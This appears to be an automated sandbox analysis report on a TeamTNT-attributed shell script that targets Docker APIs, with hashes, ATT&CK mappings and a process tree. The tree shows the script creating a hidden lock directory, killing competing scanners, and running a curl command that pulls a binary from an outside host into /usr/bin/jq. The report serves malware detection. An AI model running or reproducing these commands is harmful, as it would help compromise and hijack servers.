317806eaebb1cec9ddb962ef7fa19ee0673a67db3a8c7d650d76885041031ce8

Analysis

max time kernel
148s
max time network
16s
platform
debian-9_armhf
resource
debian9-armhf-20240729-en
resource tags

arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
29-12-2024 23:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SugarLogic_#teamtnt_by_@r3dbU7z/Docker-API.IP.Range.sh
Size

21KB
MD5

d0295e4ffb268b65f19e7e315f6ec5c6
SHA1

0164ad6ed68acd956395202fe8fd6561fe10e62c
SHA256

0dab485f5eacbbaa62c2dd5385a67becf2c352f2ebedd2b5184ab4fba89d8f19
SHA512

5795640f96e8f5514cce674e46fc2cac5c9d91c53ec7bc45e42ecb315a13851aabd83a9ed11702d7112179ea74f2f6b27febc77204aa6937409e873ec920b33a
SSDEEP

192:9Uml6l+q7osa5zmPXArSKUpVkzzfbmpWMzAH53p1RMFKodJZIYIHAFDMXT:mtHssOTmpWCAHvCdYHAFDkT

Score

6^/10

antivm discovery

Malware Config

Signatures

Enumerates running processes
Discovers information about currently running processes on the system

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl

Reads CPU attributes 1 TTPs 3 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/695/cmdline	pkill
File opened for reading	/proc/17/cmdline	pkill
File opened for reading	/proc/214/cmdline	pkill
File opened for reading	/proc/280/status	pkill
File opened for reading	/proc/151/cmdline	pkill
File opened for reading	/proc/139/cmdline	pkill
File opened for reading	/proc/690/cmdline	pkill
File opened for reading	/proc/9/status	pkill
File opened for reading	/proc/13/status	pkill
File opened for reading	/proc/7/status	pkill
File opened for reading	/proc/24/status	pkill
File opened for reading	/proc/701/status	pkill
File opened for reading	/proc/695/cmdline	pkill
File opened for reading	/proc/264/status	pkill
File opened for reading	/proc/19/cmdline	pkill
File opened for reading	/proc/5/cmdline	pkill
File opened for reading	/proc/280/cmdline	pkill
File opened for reading	/proc/214/status	pkill
File opened for reading	/proc/9/status	pkill
File opened for reading	/proc/29/status	pkill
File opened for reading	/proc/693/status	pkill
File opened for reading	/proc/279/cmdline	pkill
File opened for reading	/proc/23/status	pkill
File opened for reading	/proc/28/status	pkill
File opened for reading	/proc/311/cmdline	pkill
File opened for reading	/proc/42/status	pkill
File opened for reading	/proc/42/cmdline	pkill
File opened for reading	/proc/43/status	pkill
File opened for reading	/proc/588/status	pkill
File opened for reading	/proc/16/cmdline	pkill
File opened for reading	/proc/587/cmdline	pkill
File opened for reading	/proc/11/status	pkill
File opened for reading	/proc/638/status	pkill
File opened for reading	/proc/696/status	pkill
File opened for reading	/proc/14/status	pkill
File opened for reading	/proc/1/cmdline	pkill
File opened for reading	/proc/10/status	pkill
File opened for reading	/proc/587/status	pkill
File opened for reading	/proc/8/status	pkill
File opened for reading	/proc/43/status	pkill
File opened for reading	/proc/43/cmdline	pkill
File opened for reading	/proc/26/status	pkill
File opened for reading	/proc/98/cmdline	pkill
File opened for reading	/proc/692/status	pkill
File opened for reading	/proc/266/cmdline	pkill
File opened for reading	/proc/264/cmdline	pkill
File opened for reading	/proc/10/cmdline	pkill
File opened for reading	/proc/266/status	pkill
File opened for reading	/proc/311/status	pkill
File opened for reading	/proc/638/cmdline	pkill
File opened for reading	/proc/666/status	pkill
File opened for reading	/proc/137/cmdline	pkill
File opened for reading	/proc/168/cmdline	pkill
File opened for reading	/proc/588/cmdline	pkill
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/14/cmdline	pkill
File opened for reading	/proc/280/status	pkill
File opened for reading	/proc/262/cmdline	pkill
File opened for reading	/proc/12/status	pkill
File opened for reading	/proc/27/cmdline	pkill
File opened for reading	/proc/107/status	pkill
File opened for reading	/proc/140/cmdline	pkill
File opened for reading	/proc/664/cmdline	pkill
File opened for reading	/proc/666/cmdline	pkill

/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/Docker-API.IP.Range.sh
"/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/Docker-API.IP.Range.sh"
1⤵
PID:695
- /bin/mkdir
  mkdir -p /etc/.../.docker-api.ip.range.lock/
  2⤵
  PID:700
- /usr/bin/pkill
  pkill masscan
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:702
- /usr/bin/pkill
  pkill pnscan
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:704
- /usr/bin/pkill
  pkill zgrab
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:706
- /usr/bin/curl
  curl -sLk http://dl1.chimaera.cc:443/sugarcrm/themes/default/images/SugarLogic/.../jq/x86_64 -o /usr/bin/jq
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  PID:711

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads